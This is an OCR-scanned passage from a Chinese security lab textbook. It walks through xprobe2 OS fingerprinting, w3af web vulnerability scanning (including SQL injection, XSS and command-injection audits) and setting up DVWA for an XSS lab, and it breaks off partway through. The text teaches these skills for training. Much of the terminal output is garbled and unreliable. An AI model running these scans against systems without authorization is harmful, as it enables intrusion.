«portspec» Enable UDP portscan for spexified port(s). 
force fixed round-trip time "admeni. 
Generate signature (use -o to save toS file) 


-X Geneg&re, XML output Bnd, savé FEO og 和 le sp 
eciiedafith -9. 

-B üptiocbs Forgesi T@RsHañüshake modbld to try to 
quess open TCP port 

-A Perform analysis of sample paCKÉts gathered d 
uring portscan in 


order to detect suspicious traffic (i.e. tran 
sparent proxies, 
firewalls/NIDSs resetting connections). Use w 


图 5-31 显示 xprobe2 的 帮助 信息 


步骤 7: 对 远程 主机 探测 ,可 以 直接 通过 xprobe2, 并 指定 十 程 主 机 IP 地 址 或 主机 名 。 
例如 ,通过 “xprobe2 192.168.1.113” 命 令 将 会 对 该 主机 进行 远程 探测 ,显示 结果 如 图 5-32 
所 示 ,可 以 看 出 远程 主机 为 Windows 2003 Server 操作 系统 (这 里 已 经 很 准确 了 ) 。 
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^ v X root@bt: ~ 
File Edit View Terminal Help 
$: 1005) 
[+] Other guesses: 
DIN ERT TE icrosoft Windows 2003 Server [SDE iMi sd 
tion" (Guess probability: 100%) 
[+] Host 192.168.1.113 Running 0S: "Microsofi-windoWS 2003 SéLwer Standard Editi 
on" (Guess probability: 100%) 
[+] Host 192.168.1.113 Running : "Microsoft Windows 2000 5 adi SerWhee Pack 1 
" (Guess probability: 100%) 
[+] Host 192.168.1.113 Running : "Microsoft Windows 2000 SdEver" (Guess prbab 
ility: 100%) 
[*] Host 192.168.1.113 Running : "Microsoft Windows 2000 WorKSbabien.SP4" (Gue 
ss probability: 100%) 
[+] Host 192.1$8.1.113 Runnigg 0S: Microsoft Windows 2900 Workstatfion$sP32" «(Ghe 
ss probability 1985.) 
[*1gfíosi1,192.183. D. ARMni Os: Micmsoalt Waüdtidks 2860 workstaliOn 
ss Probability Aon) 
[+] Host 192.168.1.113 Running OS: fMicrosoft Windows 2000 Workstation < 
ss probability: 100*) 
[*] Host 192.168.1.113 Running 0S: "Microsoft Windows 2000 Workstation" 


robability: 109*) 

[*] Cleaning up scan engine 
[+] Modules deinitialized 
[+] Execution completed. 
rootabt : ~# E 


图 5-32 显示 探测 到 的 远程 主机 操作 系统 类 型 


5.4.4 任务 与 思考 


通过 本 实验 ,读者 对 BT5 的 操作 方法 有 了 更 全 面 的 掌握 。 同 时 ,还 有 一 个 问题 需要 思 
考 : 获取 到 系统 版 本 后 能 做 什么 

其 实 , 回 答 了 这 个 问题 ， 也 就 为 后 面 的 实验 提前 做 了 准备 。 获 得 系统 版 本 之 后 可 以 继续 
探测 该 系统 存在 哪些 漏洞 ,然后 利用 漏洞 找到 对 应 的 攻击 工具 ,进一步 获取 攻击 过 程 中 所 需 
要 的 信息 。 


5.5 漏洞 扫描 : Web 安全 漏洞 扫描 及 审计 
5.5.1 预备 知识 : Web 漏洞 的 获取 方法 与 waf 


1. 漏洞 扫描 

漏洞 扫 摘 除 用 于 网 络 攻 击 外 ,还 用 于 对 网 络 的 安全 防御 。 系 统管 理 员 通过 对 网 络 漏洞 
的 系统 扫描 ,全 面 地 了 解 网 络 的 安全 状态 ,并 对 发 现 的 安全 漏洞 及 时 安装 补丁 程序 ,提升 网 
络 防范 攻击 的 能 力 。 

漏洞 扫描 技术 的 工作 原理 是 基于 目标 对 象 ( 操 作 系 统 、 网 络 服务 .应 用 程序 等 ) 的 特征 码 
来 实现 的 。 例 如 ,对 于 同一 个 类 型 和 版 本 号 的 操作 系统 来 说 ,针对 某 一 安全 漏洞 ,对 于 某 些 
网 络 请 求 的 应 管 , 安 六 安 全 补丁 前 后 会 存在 一 些 细微 的 差异 ,这 些 差异 便 构成 了 针对 特定 安 
全 漏洞 的 特征 码 (指纹 信息 ) 。 漏 洞 扫描 技术 正 是 利用 了 这 些 特 征 码 来 识别 目标 对 象 是 否 存 
在 特定 的 安全 漏洞 。 

2. 漏洞 扫描 器 

网 络 漏 洞 扫描 需 对 目标 系统 进行 漏洞 检测 时 ,首先 探测 目标 网 络 中 的 存活 主机 ,对 存活 
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主机 进行 端口 扫描 ,确定 系统 已 打开 的 端口 ,同时 根据 协议 栈 指纹 技术 识别 出 主机 的 操作 系 
统 类 型 。 然 后 ,扫描 絮 对 开放 的 端口 进行 网 络 服务 类 型 的 识别 ,确定 其 提供 的 网 络 服 务 。 漏 
洞 扫 描 带 根据 目标 系统 的 操作 系统 平台 和 提供 的 网 络 服务 ,调用 漏洞 资料 库 ( 一 般 该 资料 库 
需要 与 业界 标准 的 CVE 保持 兼容 ) 中 已 知 的 各 种 漏洞 进行 逐一 检测 ,通过 对 探测 啊 应 数据 
包 的 分 析 判 断 是 否 存 在 漏洞 。 

3. w3af 

w3afC web applicaiton attack and audit framework, Web 应 用 攻击 与 审计 架构 ) 是 一 个 
Web 应 用 安全 的 攻击 、 审 计 平 台 , 通 过 增加 插件 的 方式 来 对 功能 进行 扩展 。w3af Z& — XH 
python 写 的 工具 ,同时 支持 GUI 和 命令 行 模式 。 

w3af 目前 已 经 集成 了 大 量 的 功能 丰富 的 各 类 攻击 和 审计 插件 ,为 便于 使 用 ,对 插件 进 
行 了 分 类 ,而 且 有 些 插件 还 提供 了 一 个 实用 工具 ,并 文 持 多 种 加 解密 算法 。 下 面 介 绍 几 类 典 
型 的 w3af 插件 。 

(D. Crawl 类 插件 。Crawl( 讨 取 ) 类 插件 的 功能 是 通过 爬 取 网 站 站点 来 获得 新 的 URL 
地 址 。 如 果 用 户 启用 了 Crawl 类 的 插件 ,将 会 产生 一 个 循环 操作 : A 插件 在 第 一 次 运行 时 
发 现 了 一 个 新 的 URL.w3af 会 将 其 发 送 到 插件 B; 如 果 插 件 B 发 现 了 一 个 新 的 URL, 则 会 
将 其 发 送 到 插件 A。 这 个 过 程 持续 进行 ,直到 所 有 插件 都 已 运行 且 无 法 找到 更 多 的 新 信息 
为 止 。 

(2) Audit 类 插件 。Audit( 审 计 ) 类 插件 会 向 Crawl 插件 候 取 出 的 注入 点 发 送 特制 的 探 
测 信息 ,以 确认 是 否 存 在 漏洞 。 

(3) Attack 类 插件 。 如 果 Audit 插件 发 现 了 漏洞 ,Attack( 攻 击 ) 类 插件 将 会 进行 攻击 
和 漏洞 利用 。 通 篆 会 在 迁 程 服务 天 上 返回 一 个 操作 界面 ,或 者 进行 SQL 注入 以 获取 数据 库 
中 的 数据 。 

(4) Infrastructure 类 插件。Infrastructure( 基 础 设施 ) 类 插件 用 来 探测 有 关 目 标 系统 的 
信息 ,如 目标 系统 是 否 安装 了 WAF(Web Application Firewall, Web 应 用 程序 防火 墙 )、 目 
标 系统 运行 的 操作 系统 .目标 系统 上 运行 的 HTTP 守护 进程 等 。 

(5) Grep 类 插件 。Grep (检索) 类 插件 会 分 析 其 他 插件 发 送 的 HTTP 请 求 和 应 用 信 
县 ,并 识别 存在 的 漏洞 。 

(6) Output 类 插件 。Output( 输 出 ) 类 插件 会 将 插件 的 数据 以 文本 .XML 或 HTML JÉ 
式 保存 , 供 分 析 使 用 。 另 外 ,如 果 启 用 了 text_file 和 xml. file 两 个 Output 插件 ,就 会 记录 有 
X Audit 类 插件 发 现 的 任何 漏洞 。 

另外 ,Mangle 类 搬 件 允许 用 户 修改 基 于 正则 表达 式 的 请 求 和 啊 应 ,Broutforce 类 插件 
在 爬 取 阶段 可 以 对 系统 进行 又 力 登 录 ,Evasion 类 插件 通过 修改 由 其 他 插件 生成 的 HTTP 
请 求 来 绕 过 简单 的 入侵 检测 规则 。 


5.2.2 实验 目的 和 条 件 


1. 实验 目的 
在 进行 该 实验 之 前 ,读者 事先 需要 对 漏洞 的 产生 .安全 威胁 及 管理 方法 有 所 和 擎 握 。 在 此 
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基础 上 ,通过 对 w3af 工具 使 用 方法 的 学 习 , 使 谈 者 能 够 学 握 服务 天 安全 漏洞 的 扫 朱 和 审计 
nio 
2. 实验 条 件 
本 实验 中 使 用 的 清单 和 软 硬 件 如 表 5-2 所 示 。 
表 5-2 Web 安全 漏洞 扫描 及 审计 实验 清单 


act sr: 
数量 


1 台 


$m gl 操作 系统 版 本 Windows Server 2003 
软件 版 本 Xx 


5.5.3 实验 过 程 


步骤 1: 运行 攻击 机 。 正 确 登 录 BT5 系统 ,如 果 进 入 的 是 命令 行 模式 ,为 方便 实验 进 
行 , 可 输入 “startx” 命 令 进入 图 形 界面 。 选 择 沫 单 栏 上 的 Terminal 选项 ,打开 终端 操作 窗口 。 

步骤 2: 运行 “cd /pentest/web/w3af” 命 令 ,切换 到 w3af 工作 目录 ,然后 使 用 "1s” 命 令 
查看 当前 目录 下 的 文件 ,如 图 5-33 所 示 。 


^ v x root@bt: /pentest/web/w3af 


File Edit View Terminal Help 
rootebt:~# cd /pentest/web/w3af/ 
rootébt : /pentest/web/w3afs$ ls 
locales profiles scripts w3af console 
extlib plugins readme tools w3af gui 
rootabt: /pentest/web/w3af* 


图 5-33 ”显示 /pentest/web/w3af 目录 下 的 内 容 
步骤 3: EH“. /w3af_console” 命 令 启 用 w3af, 并 转 到 个 性 化 的 控制 台 模 式 (w3af >>>) ,如 
图 5-34 所 示 。 虽 然 该 工具 同时 提供 了 GUI 版 本 ,但 考虑 到 控制 的 灵活 性 和 自 定义 配置 ,在 
具体 应 用 中 建议 使 用 控制 台 版 本 。 
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^ v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


lürootébt: /pentest/web/w3af* ./w3af console 

Checking if a new version is available in our SVN repository. Please wait... 
At revision 6654. 

w3af»»» Į 


图 5-34 w3af 的 个 性 化 控制 台 模 式 


为 便于 实验 的 进行 ,建议 谈 者 使 用 "help” 帮 助 命 令 ,查看 相关 的 命令 介绍 。 
步骤 4: 首先 使 用 “plugins” 命 令 配 置 相关 的 插件 ,然后 用 “help” 命 令 查 看 操作 
助 信息 ,如 图 5-35 所 示 。 


步 又 


^ vw X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


Iw3af>>> plugins 


w3af/plugins»»» help 


Go to the previous menu. 
Exit w3af. 
Check assertion. 


| configure and enable grep plugins 
discovery configure and enable discovery plugins 
audit , configure and enable audit plugins 
evasion , configure apd enable evasion plugins 


ath | Conf igre afd eb aufi giugihf 
bl'tefónce Conf igre afd enable Dtutelored! Dhugins 


| 
| 
| 
| 
| mangle configure ald eble mangle plugins 
| 
| 
| output configure afd enable output plugins 


w3af /plugins»»» 
w3af /plugins»»» 
w3af /plugins»»» 
w3af /plugins»»» 
w3af /plugins»»» 
w3af /plugins»»» 


图 5-35 进入 plugins 目录 并 显示 帮助 信息 


: lij A "output" fp 4 BO E output 类 插件 ,将 显示 如 图 5-36 所 示 的 信息 。 
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^ v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


w3af /plugins»»» 
w3af/plugins»»» 
w3af/plugins»»» 
w3af /plugins»»» 
w3af/plugins»»» output 


console Print messages to the conSObes 

csv file Export identified vulnerabilities tona 
CSV file. 

emailReport Emdil report to suecifiedladdresseés. 

axporisTequasts Expor W thesdtzzablefTequastS.. T oünd 
dur&ag! di$cdyentys t à. file, 

gtkOutput Saves messages to 
kb.kb.getData('gtkOutput', "quéue') to 
be displayed in the UI. 

htmlFile Print all messages to a HTML file. 

textFile Prints all messages to a text file. 

xmlFile 


图 5-36 ”输入 “output” 命 令 后 显示 的 信息 
步骤 6: 使 用 “view ”命令 列 出 可 利用 的 选项 和 值 ,如 图 5-37 所 示 。 


^ *v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


qu3af/plugins/output/config:htmlFile»»» a 
w3af/plugins/output/config:htmlFile>>> 
w3af/plugins/output/config:htmlFile>>> 
w3af/plugins/output/config:htmlFile»»» 
w3af /plugins/output/config:htmlFile»»» 
w3af /plugins/output/config:htmlFile»»- 
w3af /plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af /plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/aytput/config:hgmlFiles»» view 


| Settind" | Vglug | Destription 

|--~---A--- AS -es *a-—[-- 53-4 edP O A | 
| verbose | False True if febug information will be dppermüed/to the 

E | | report. 

| fileName | report.html | File name where this plugin will write to 


w3af /plugins/output/config:htmlFile»»» 
w3af /plugins/output/config:htmlFile»»» 
w3af /plugins/output/config:htmlFile»»» 
iw3af/plugins/output/config:htmlFile»»» 


图 5-37 使 用 “view” 命 令 列 出 可 利用 的 选项 和 值 


步骤 7: 使 用 “set fileName testreport. hm” MA ,设置 输出 的 扫描 报告 文件 为 testreport. 
html, 如 图 5-38 所 示 。 
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^ v x root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


aw3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»- 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» set verbose True 
w3af/plugins/output/config:htmlFile»»» set fiteName testreport;html 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af /plugins/aytput/config:hi lFilez»» 
vant /ptugins/ dirigat ighne tele p 
w3affpludins/dUtpüt/ceMffg:hfwtFilez»» | 
w3atyplugtns/dütpirt/conf 1g;htmtki les>> 
w3af/plugins/output/config:htmlFile?$»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 


图 5-38 ”设置 输出 的 扫描 报告 文件 testreport, html 


步骤 8: 使 用 “back” 命 令 返 回 plugins, 在 使 用 “output config console” 命 令 的 同时 使 用 
help 查看 可 使 用 的 命令 ,如 图 5-39 所 示 。 


r 


^ v X rootGbt /pentest/web/w3af 
File Edit View Terminal Help 


w3af/plugins/output/config:htmlFile»»» back 
w3af/plugins»»» help 


| Go to the previous menu. 
| Exit w3af. 
| Check assertion. 


configure grep plüfgins 
discovery | configure discovery plugins 
audit j configure audit plugins 
evasion j configure evasion plugins 


auth e f gonf jgfire € auth pluging 
brhtefühce [h Conf iqtire able Dtutefàrce) phugins 


| 

| 

| 

| 

| mangle ol View, configure mble mangle plugins 
| F 

| 

| configure output plugins 


w3af/plugins>>> output config console 
w3af/plugins/output/config:console>>> 


| List the available options and their values. 
| Set a parameter value. 


图 5-39 ”返回 plugins 目录 后 运行 “output config console" ip € 


verbose False" fl" back" dp ^ ,返回 插件 设置 界面 ,如 图 5-40 所 示 。 
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^ v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


w3af/plugins/output/config:console»»» set verbose False 
w3af/plugins/output/config:console»»» back 


w3af /plugins»»» 
w3af/plugins»»» 


图 5-40 ”输入 “set verbose False" p 
步骤 10. 输入 “audit” 命 令 ,显示 如 图 5-41 所 示 的 漏洞 类 型 。 


^ v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 
mw3af/plugins»»» audit 


Find LDAP-1mnjéction bugs. 

blindSqli Identify blind.SQt injection 
vulnerabilities. 

buffOverflow Find buffer overflow vulnerabilities 

dav Verify ifythe WebDAV mgdule is 
properly configured. 

eval Find insecure eval() usagevAndres 

Riancho ( andres.rianchoggmail.com } 

: : Uploads a file and then searctresyfor 

l da p tfe. tile inside, dll knowh directories. 

iof mais trind 9 4-3 f uf Fihd format! sfringfvutnerabiTTties. 

ffentpdge l | Ih Te totupl dâdsdi fle using frontpage 
extensions (author.dll). 

generic Find all kind of bugs withOUt using a 
fixed database of errors. 

globalRedirect Find scripts that redirect the browser 
to any site. 

htaccessMethods Find misconfigurations in the 
"«LIMIT»" configuration of Apache. 

localFileInclude Find local file inclusion 


fileUpload 


| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 


图 5-41 显示 漏洞 类 型 
zy . HA "audit htaccessmethods. oscommanding. sali. xss" M ^. 
步骤 11: 输入 lit ht hod ling. sql ”命令 ,分 别 对 
htaccessmethods ,oscommanding,sgli 和 xss 进行 审计 操作 ,然后 使 用 ”back” 命 令 返回 主 目 
录 ,如 图 5-42 所 示 。 
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v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


vaat/ptugins 二 | " 
ff pludins»- alid ia fee. [Gg o if X 


w3af»»» 
w3af»»» 


图 5-42 Xf htaccessmethods , oscommanding sqli 和 xss 进行 审计 


步骤 12: 使 用 “target” 命 令 进入 target 目录 ,如 图 5-43 所 示 。 


^ v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


List the available options and their values. 
Set a parameter value. 


Go to the previous menu. 
Exit w3af. 
Check assertion. 


中 W SED 
F ffescriptian " 


anod Eg gai W pO ü U a vovo NN. | 
| target05 unknown | ~] operating system (unknowBZurttX/windows ) | 
| targetFramework | unknown | Target programming framework | 
| (unknown/php/asp/asp.net/java/jsp/cfm/ruby/perl) | 
| A comma separated list of URLs 


w3af/config:target»»» 
w3af /config:target»»» 
w3af/config:target»»» 


B] 5-43 使 用 “target” 命 令 进 入 target 目录 


步骤 13: 设置 目标 地 址 target 为 http://192. 168. 1. 108, 为 下 一 步 扫 描 进行 准备 ,如 
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^ v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


:target»»» 
: target»»» 
:target»»» set target http://192.168.1.1088 
:target»»» 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:] get»»» 四 
DR mr 
pfi Ps i We HF wf 
Tig: target^»» | 
: target>>> 
:target»»» 
:target»»» 
:target»»» 
w3af /config:target»»» 
w3af/config:target»»» 
w3af/config:target»»» 
w3af/config:target»»» | 


图 5-44 ”设置 目标 地 址 target 


步骤 14. EH “back” mA h] EH $ w3af >>>, 然 后 使 用 “start” 命 邻 开 始 扫 摘 ,如 
图 5-45 所 示 。 


^ v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


:target»»» 
:target»»» 
:target»»» 
:target»»» 
:target»»» 
:target»»» 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> back 


Auto-enabling Plugin; .grepshltpauthüetegt, . = l 
Found lls amd 1 diffefent pbints[of ihjdft ibad 4 
The tist èf URs Ast. 、 | | 

- http://192.168.1.108 

The list of fuzzable requests is: 

- http://192.168.1.108 | Method: GET 

Scan finished in 3 seconds. 


图 5-45 ”使 用 “start” 命 令 开 始 扫描 


步骤 15i 使 用 “exit” 命 令 退 出 ,然后 使 用 “ls” 命 令 查 看 是 否 
html 文件 ,如 图 5-46 所 示 ( 存 在 该 文件 ) 。 


uy, 


有 前 面 创 建 的 testreport. 
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A V x root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


root@bt:/pentest/web/w3af# ls 

core locales profiles scripts tools w3df gui 
extlib plugins readme testreport.html w3af console 
root@bt: /pentest/web/w3afs 

root&bt: /pentest/web/w3af* 

root@bt: /pentest/web/w3af* 

root&bt : /pentes t/web/u3af... 

rogifbt;fpentest/Web/w3af* | 

rootitt : /pentest/Wweb/w3af 

rootébt : /pentest/web/w3afs 

rootébt : /pentest/web/w3af* 

root@bt: /pentest/web/w3afs 

rootébt : /pentest/web/w3af$ 

root@bt: /pentest/web/w3af* 

rootébt: /pentest/web/w3afs 

rootébt : /pentest/web/w3af? 

rootébt: /pentest/web/w3afs |l 


5-46 退出 扫描 并 查看 创建 的 文件 是 否 存在 


步骤 16: 利用 浏览 硕 ( 本 实验 为 Firefox) 打 开 testreport. html 文件 ,显示 如 图 5-47 所 
示 的 信息 。 在 该 页 面 中 详细 记录 了 前 面 实 验 中 扫描 得 到 的 信息 ,包括 audit 扫 摘 出 的 漏洞 、 
配置 attack 进行 的 攻击 利用 等 。 


ces System [> | Fri Feb 1, 1:19 AM 
* w3af - Web Attack and Audit Framework - Vulnerability Report - Mozilla Firefox 


Time Message 
(" e j|" 
Fri 01 Feb | 
2013 01:16:27 debug Exiting setOutputPlugins() 
AM EST 

Fri 01 Feb 


2013 01:16:27 debug Called w3afCore.start() 
AM EST 


‚Enabled plugins: 
[*] root@bt: /pentest/web/... €) w3af- Web Attack and... 


图 5-47 显示 testreport, html 文件 的 内 容 


5.5.4 任务 与 思考 


在 具体 应 用 中 ,主要 使 用 漏洞 扫描 硕 进行 独 洞 的 扫描 和 发 展 。 下 面 介 绍 漏洞 扫描 需 的 
组 成 和 主要 功能 。 
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1. 安全 漏洞 数据 库 

安全 漏洞 数据 库 一 般 与 CVECCommon Vulnerabilities and Exposures ,通用 漏洞 披露 
目录 ) 保 持 兼 容 , 主 要 包含 安全 漏洞 的 具体 信息 漏洞 扫描 评估 的 脚本 、 安 全 漏洞 危害 评分 
(一 般 采用 CVSS 通用 漏洞 分 组 评价 体系 标准 ) 等 信息 ,新 的 安全 漏洞 被 公开 后 ,数据 库 需 要 
及 时 更 新 。 其 中 ,CVSSCCommon Vulnerability Scoring System ,通用 漏洞 评分 系统 ) 是 一 
个 开放 的 并 且 能 够 被 产品 厂商 免费 采用 的 标准 。 

2. 扫描 引擎 模块 

作为 漏洞 扫描 希 的 核心 部 件 ,扫描 引擎 模块 可 以 根据 用 户 在 配置 控制 台 上 设 定 的 扫描 
目标 和 扫描 方法 ,对 用 来 扫描 网 络 的 请 求 数据 包 进 行 配置 与 发 送 , 并 将 从 目标 主机 接收 到 的 
应 答 包 与 漏洞 数据 库 中 的 漏洞 特征 码 进行 比 对 ,以 判断 目标 主机 上 是 否 存在 这 些 安全 漏洞 。 
为 了 提高 效率 ,扫描 引擎 模块 一 般 提供 了 主机 扫描 、 端 口 扫 描 、 操 作 系 统 扫描 、 网 络 服务 探测 
等 功能 , 供 具体 扫描 时 选用 。 

3. HP BE EHE SIG 

用 户 配 置 控制 台 是 供用 户 进行 扫描 设置 的 操作 窗口 ,需要 扫描 的 目标 系统 、 检 测 的 具体 
漏洞 等 信息 都 可 以 通过 配置 控制 台 来 设置 。 

4. 扫描 进程 控制 模块 

在 针对 漏洞 的 具体 扫描 过 程 中 ,攻击 者 不 仅 需 要 知道 扫 摘 结果 ,许多 时 候 还 要 实时 了 解 
扫描 过 程 中 显示 的 内 容 , 以 便 通 过 一 些 细节 来 获取 有 价值 的 信息 。 扫 描 进程 控制 模块 提供 
了 这 些 功能 。 


5.6 XSS 跨 站 脚本 攻击 


5.6.1 预备 知识 : 关于 DVWA 


DVWA(Damn Vulnerable Web Application) 是 基于 PHP 4- MySQL 的 一 套用 于 常规 
Web 漏洞 教学 和 检测 Web 脆弱 性 的 程序 ,可 以 为 安全 专业 人 员 测 试 自 己 的 专业 技能 和 工 
具 提 供 所 需要 的 环境 ,帮助 Web 开发 者 更 好 地 擎 握 Web 应 用 安全 防范 的 过 程 。 

DVWA 提供 了 以 下 10 个 功能 模块 。 

(1) Brute ForceCzÉ 7] BE 81) 。 

(2) Command Injection (MA £T1E AO 。 

(3) CSRF( 跨 站 请 求 伪 造 )。 

(4) File Inclusion( 文 件 包 含 ) 。 

(5) File Upload( 文 件 上 传 ) 。 

(6) Insecure CAPTCHA Cf AE B Us ub T), 

(7) SQL InjectionC SQL 1E A), 

(8) SQL InjectionCBlind) (SQL Ei i). 

(9) XSSCReflected) (反射 型 跨 站 脚本 )。 


$53 Web 服务 器 攻防 实 训 189 


(10) XSS(Stored) (存储 型 跨 站 脚本 ) 。 
需要 注意 的 是 ,DVWA 的 代码 分 为 4 种 安全 级 别 : Low, Medium, High 和 Impossible, 
初学 者 可 以 通过 比较 4 种 级 别 的 代码 ,接触 一 些 PHP 代码 审计 的 内 容 。 


5.6.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,读者 可 掌握 以 下 内 容 。 

(OD 了 解 KSS 漏洞 的 攻击 原理 及 相关 知识 。 
(2) 能 够 进行 简单 的 攻击 分 析 。 


2. 实验 条 件 


由 于 DVWA 环境 是 基于 php/MySQL 的 ,因此 需要 先 安装 DVWA 环境 。 为 了 便于 操 
作 ,建议 直接 使 用 XAMPP 集成 软件 来 搭建 。 本 例 在 Windows 环境 下 安装 ,并 使 用 与 
XAMPP 和 集成 的 DVWA ,具体 操作 步骤 如 下 。 

步骤 1: X XAMPP, M http://www. xampps. com/ 官 网 下 载 和 安装 ,只 需 注 意 选 
择 Windows 环境 ,其 他 的 按照 系统 提示 进行 即 可 。 

步骤 2: 下 载 DVWA 压缩 包 。 从 http://www. dvwa. co. uk/ 官 网 下 载 DVWA 压缩 
包 ,并 将 压缩 包 解 压 到 dvwa ,再 将 其 复制 到 XAMPP 安装 目录 下 的 \xampp\htdocs 目录 。 

步骤 3: 通过 XAMPP 的 控制 台 启 动 XAMPP 的 Apache 和 MySQL 服务 ,如 图 5-48 
所 示 。 


加 XANPP Lite 2016 3 x 
XAMPP Lite 控制 面板 2016 
Service Module  PID() Pei Aai 
MEE : 

MySQL 460 3306 

FileZilla rium 


ua 


5:52:48 [main] 可 访问 官方 网 站 www.xampps.com 获取 帮助 ，... 
3:52:48 [main] Running with Administrator rights - good! 
3:52:48 [main] XAMPP Lite 安装 目录 : "c:iXxamppi" 
:52:48 [nain] 初始 化 模块 ..， 
3:52:48 [main] 控制 面板 已 经 准备 好 
52 [Apache] Attempting to start Apache app... 
[Àpache] Status change detected: running 
3:52:52 [mysql] Attempting to start MySQL app... 
:52:52 [mysql] Status change detected: running 


5-48 通过 XAMPP 的 控制 台 启 动 XAMPP 的 Apache 和 MySQL 服务 


步骤 4: 修改 \xampp\htdocs\dvwa\config 下 的 config. php 配置 文件 ,在 该 配置 文件 中 
包含 了 连接 MySQL 数据 库 的 密码 (XAMPP 集成 环境 下 面 MySQL 的 默认 登录 账号 和 密 
码 为 root/root)。 
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步骤 5: 在 浏览 器 中 输入 “http://127.0.0.1/DVWA/setup. php”, 就 可 以 访问 DVWA 
的 配置 页 面 , 如 图 5-49 所 示 。 单 击 该 页 面 中 的 Create/Reset Database 按钮 ,就 可 以 直接 将 
DVWA 的 数据 库 建立 起 来 。 


Database Setup ^ 


Click on the 'Create / Reset Database' button below to create or reset your database. 
If you get an error make sure you have the correct user credentials in: 
E:3Axampptlhtdocsidvwa/config/config.inc.php 


If the database already exists, it will be cleared and the data will be reset. 
You can also use this to reset the administrator credentials ('admin // password") at any stage. 


Setup Check 


Operating system: Windows 
Backend database. MySQL 
PHP version: 5.4.34 


Web Server SERVER NAME: 


PHP function display errors: Enabled (Easy Mode!) 
PHP function safe mode: Disabled 

PHP function allow url include: Disabled 

PHP function allow url fopen: Enabled 

PHP function magic quotes gpc: Disabled 

PHP module php-gd: Installed 


reCAPTCHA key: Missing 


Writable folder E xampphhtdocsidvwa/hackable/uploads/: Y es) 
Writable file E-xamppthtdocsdvwa/external/phpids/0 6/lib/!DS/tmp/phpids log.txt: Yes 


Status in red, indicate there will be an issue when trying to complete some modules. 


| Create / Reset Database 
5-49 访问 DVWA 配置 页 面 并 通过 Create/Reset Database 建立 数据 库 


另外 ,在 XAMPP 环境 下 ,也 可 以 通过 如 图 5-50 所 示 的 操作 界面 来 创建 DVWA 数据 
E. HA Setup Check 全 部 显示 为 绿色 ,而 没有 出 现 红 色 时 ,才能 表示 完全 安装 成 功 。 


Create / Reset Database 


Database has been created. 
users' table was created. 


Data inserted into 'users' table. 


guestbook' table was created. 


Data inserted into 'questbook' table. 
5-50 Æ XAMPP 环境 下 创建 DVWA 数据 库 


创建 好 DVW A 数据 库 后 ,系统 自动 跳 转 到 DVWA 的 登录 页 面 , 如 图 5-51 所 示 , 系 统 
默认 的 登录 账号 名 称 和 密码 为 admin/password 。 
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© 127.0.0.1/DVWA/login.php 


UN 


DVWA/ 


Username 


admin 


Password 


5-51 DVWA 登录 页 面 


5.6.3 实验 过 程 


步骤 1: 进入 实验 场景 ,打开 XAMPP( 依 次 选择 “开始 ”一 “所 有 程序 ”一 XAMPP 一 
XAMPP Control Panel 选项 ) 控 制 台 ,在 图 5-48 所 示 的 界面 中 ,开启 Apache HTTP 服务 和 
MySQL 服务 。 

步骤 2: 打开 DVWA 网 站 。 在 浏览 器 中 输入 “http://127.0.0.1/dvwa”, 正 确 输 入 账 
号 名 称 和 密码 (系统 默认 为 admin/password) 后 登录 ,如 图 5-52 所 示 。 


© 127.0.0.1/DVWA/index.php 


Welcome to Damn Vulnerable Web Application! 


Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main 
goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web 
developers better understand the processes of securing web applications and to aid both students & teachers to 
leam about web application security in a controlled class room environment. 


The aim of DVWA is to practice some of the most common web vulnerability, with various difficultly 
levels, with a simple straightforward interface 


General Instructions 


It is up to the user how they approach DVWA. Either by working through every module at a fixed level, or 
selecting any module and working up to reach the highest level they can before moving onto the next one. There 
is not a fixed object to complete a module; however users should feel that they have successfully exploited the 
system as best as they possible could by using that particular vulnerability 


Please note, there are both documented and undocumented vulnerability with this software. This is 
intentional. You are encouraged to try and discover as many issues as possible 


DVWA also includes a Web Application Firewall (WAF), PHPIDS, which can be enabled at any stage to further 
increase the difficulty This will demonstrate how adding another layer of security may block certain malicious 
actions. Note, there are also various public methods at bypassing these protections (so this can be see an as 
extension for more advance users )! 


There is a help button at the bottom of each page. which allows you to view hints & tips for that vulnerability 
Thoro aro also additional links for furthor background reading, which rolatos to that socurity issue. 


WARNING! 


5-52 DVWA 成 功 登 录 后 的 主页 面 


步骤 3: 选择 XSSCReflected) 后 ,打开 存在 漏洞 的 网 站 (本 实验 为 http:// 127. 0. 0. 1/ 
